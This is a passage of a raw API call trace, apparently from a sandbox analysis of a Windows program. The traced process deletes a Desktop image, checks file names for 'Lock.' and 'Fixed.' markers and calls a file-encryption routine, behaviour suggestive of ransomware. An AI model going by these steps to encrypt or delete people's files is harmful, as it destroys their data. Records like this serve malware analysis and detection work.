[0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0128.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.847] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0128.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0128.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0128.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0128.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.848] CloseHandle (hObject=0x2a0) returned 1 [0128.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0128.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0128.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0128.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0128.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0128.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0128.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0128.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0128.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.866] CloseHandle (hObject=0x2d0) returned 1 [0128.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0128.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0128.881] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.882] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0128.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0128.882] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-2dSSUPd3c99IL5ta.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\-2dSSUPd3c99IL5ta.jpg", lpFilePart=0x8cedf4*="-2dSSUPd3c99IL5ta.jpg") returned 0x2d [0128.882] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-2dSSUPd3c99IL5ta.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\-2dssupd3c99il5ta.jpg")) returned 0x20 [0128.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\-2dSSUPd3c99IL5ta.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3d862f0, ftCreationTime.dwHighDateTime=0x1d5ec49, ftLastAccessTime.dwLowDateTime=0xc71b7f30, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0xc71b7f30, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0xf8fc, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="-2dSSUPd3c99IL5ta.jpg", cAlternateFileName="-2DSSU~1.JPG")) returned 0xa87090 [0128.883] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-2dSSUPd3c99IL5ta.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\-2dssupd3c99il5ta.jpg")) returned 1 [0128.897] FindNextFileW (in: hFindFile=0xa87090, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3d862f0, ftCreationTime.dwHighDateTime=0x1d5ec49, ftLastAccessTime.dwLowDateTime=0xc71b7f30, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0xc71b7f30, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0xf8fc, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="-2dSSUPd3c99IL5ta.jpg", cAlternateFileName="-2DSSU~1.JPG")) returned 0 [0128.897] FindClose (in: hFindFile=0xa87090 | out: hFindFile=0xa87090) returned 1 [0128.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0128.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0128.898] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0128.898] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0128.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e563a8 [0128.899] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-2dSSUPd3c99IL5ta.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\-2dSSUPd3c99IL5ta.jpg", lpFilePart=0x8cf650*="-2dSSUPd3c99IL5ta.jpg") returned 0x2d [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0128.899] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-2dSSUPd3c99IL5ta.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\-2dssupd3c99il5ta.jpg")) returned 0xffffffff [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0128.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0128.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0128.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0128.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-U62pFYLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U62pFYLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="62pFYLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2pFYLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFYLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FYLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YLePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0128.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PGc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0128.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gc.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0128.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0128.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0128.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0128.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x22) returned 0x977c68 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-U62pFYLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U62pFYLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="62pFYLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2pFYLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFYLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FYLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YLePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PGc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gc.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0128.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0128.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0128.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f280 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0128.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0128.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0128.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0128.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.903] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0128.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0128.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0128.904] RtlAllocateHeap 